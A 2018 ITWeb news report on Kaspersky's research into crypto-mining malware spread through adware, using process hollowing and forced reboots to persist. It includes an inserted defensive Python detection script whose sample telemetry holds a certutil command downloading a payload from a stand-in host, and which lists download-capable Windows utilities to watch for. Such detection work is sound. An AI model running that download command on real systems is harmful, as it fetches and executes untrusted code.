
Cyber criminals borrow APT techniques to install mining software

By Staff Writer, ITWeb
Johannesburg, 06 Mar 2018
Ransomware is fading into the background.

Kaspersky Lab researchers have discovered that cyber criminals have begun using sophisticated infection methods and techniques borrowed from targeted attacks to install mining software on infected PCs.

The company says the most successful group it noted earned at least $7 million by exploiting their victims in just six months of 2017.

The crypto-currency market is volatile, and the surge in the value of Bitcoin in 2017 has significantly changed global economics and the world of cyber security too.

"With the aim of earning crypto-currency, criminals have started to use mining software in their attacks, which, like ransomware, has a simple monetisation model. But, unlike ransomware, it doesn't destructively harm users and is able to stay undetected for a long time by silently using the PC's power," Kaspersky adds.

The security giant's researchers recently identified a cyber criminal group with APT techniques in their arsenal of tools used to infect users with miners. "They have been using the process-hollowing method that is usually used in malware and has been seen in some targeted attacks of APT actors, but has never been observed in mining attacks before."

How it works

During the attacks, the victim is tricked into downloading and installing advertisement software with the miner installer hidden inside. This installer drops a legitimate Windows utility to download the miner itself from a remote server.

Following execution, a legitimate system process is started and its code in memory is replaced with the malicious code (the process-hollowing technique mentioned above). In this way, the miner operates under the guise of a legitimate task, so the user is unable to see that a mining infection has taken place.

This threat can also slip through the security net, because the installed miner resists being terminated. "If the user tries to stop the process, the computer system will reboot. As a result, criminals protect their presence in the system for a longer and more productive time."
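The infection chain above leaves observable traces at each step: a signed Windows utility launched by an installer in a user-writable location with a download URL on its command line, a system process whose in-memory image no longer matches its file on disk, and a system process burning CPU for long periods. The following added example (not Kaspersky's code or part of the original article) sketches how a defender might score process telemetry for exactly those indicators. The event fields, the list of download-capable utilities, the CPU threshold and the sample events are all constructed assumptions; the `mapped_hash` field in particular assumes an EDR that can hash the main module as it is mapped in memory.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ProcEvent:
    """One process-telemetry record (constructed schema for this example)."""
    pid: int
    image: str             # on-disk path of the process executable
    parent_image: str      # on-disk path of the parent process executable
    cmdline: str
    image_hash: str = ""   # hash of the executable on disk
    mapped_hash: str = ""  # hash of the main module as mapped in memory (assumed EDR field)
    cpu_pct: float = 0.0   # sustained CPU share observed for the process


SYSTEM_DIR = "c:\\windows\\"
# Assumed list of signed Windows utilities that can fetch remote content; adapt to your estate.
DOWNLOAD_CAPABLE = {"certutil.exe", "bitsadmin.exe"}
# Assumed threshold for "sustained high CPU" in a system process.
CPU_THRESHOLD = 80.0


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _is_system(path: str) -> bool:
    return path.lower().startswith(SYSTEM_DIR)


def downloader_abuse(ev: ProcEvent) -> bool:
    """Legitimate Windows utility launched from outside the system directory with a URL argument."""
    return (_name(ev.image) in DOWNLOAD_CAPABLE
            and "http" in ev.cmdline.lower()
            and not _is_system(ev.parent_image))


def hollowing_indicator(ev: ProcEvent) -> bool:
    """System process whose in-memory main module differs from the file on disk."""
    return (_is_system(ev.image)
            and bool(ev.image_hash) and bool(ev.mapped_hash)
            and ev.image_hash != ev.mapped_hash)


def sustained_cpu(ev: ProcEvent) -> bool:
    """System process consuming CPU at a level consistent with mining."""
    return _is_system(ev.image) and ev.cpu_pct >= CPU_THRESHOLD


def triage(events: list) -> list:
    """Return (pid, [reasons]) for every event matching at least one indicator."""
    findings = []
    for ev in events:
        reasons = []
        if downloader_abuse(ev):
            reasons.append("download-capable utility launched from user path with URL")
        if hollowing_indicator(ev):
            reasons.append("mapped image differs from on-disk image")
        if sustained_cpu(ev):
            reasons.append("sustained high CPU in system process")
        if reasons:
            findings.append((ev.pid, reasons))
    return findings


# Constructed sample telemetry: one benign user process, one installer-driven download,
# one hollowed system process that is mining, and one healthy system process.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe",
              "explorer.exe", "aaa", "aaa", 2.0),
    ProcEvent(201, r"C:\Windows\System32\certutil.exe",
              r"C:\Users\victim\AppData\Local\Temp\adware_setup.exe",
              "certutil.exe -urlcache -split -f http://example.invalid/payload out.bin",
              "bbb", "bbb", 1.0),
    ProcEvent(202, r"C:\Windows\System32\svchost.exe",
              r"C:\Users\victim\AppData\Local\Temp\adware_setup.exe",
              "svchost.exe -k netsvcs", "ccc", "zzz", 97.5),
    ProcEvent(203, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs", "ccc", "ccc", 3.0),
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Each indicator alone produces false positives (administrators do run certutil with URLs; some services legitimately patch themselves in memory), so the point of `triage` is correlation: a single process matching two indicators, or a download event followed by a mismatch in a process with the same parent, is far stronger than any one signal.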

Anton Ivanov, lead malware analyst at Kaspersky Lab, says that ransomware is fading into the background and miners are growing in popularity. Kaspersky Lab statistics confirm this, showing steady growth in miners throughout the year. "Cyber criminal groups are actively developing their methods and have already started to use more sophisticated techniques to spread mining software."

This evolution was also noted with ransomware attackers, who used the same tricks when they were on the rise.

Adware, cracked games, pirated software

According to Kaspersky data, some 2.7 million users were attacked by malicious miners in 2017, 50% higher than the previous year.

"They have been falling victim as a result of adware, cracked games and pirated software used by cyber criminals to secretly infect their PCs. Another approach employed was Web mining through a special code located in an infected Web page. The most widely used Web miner was CoinHive, discovered on many popular Web sites."
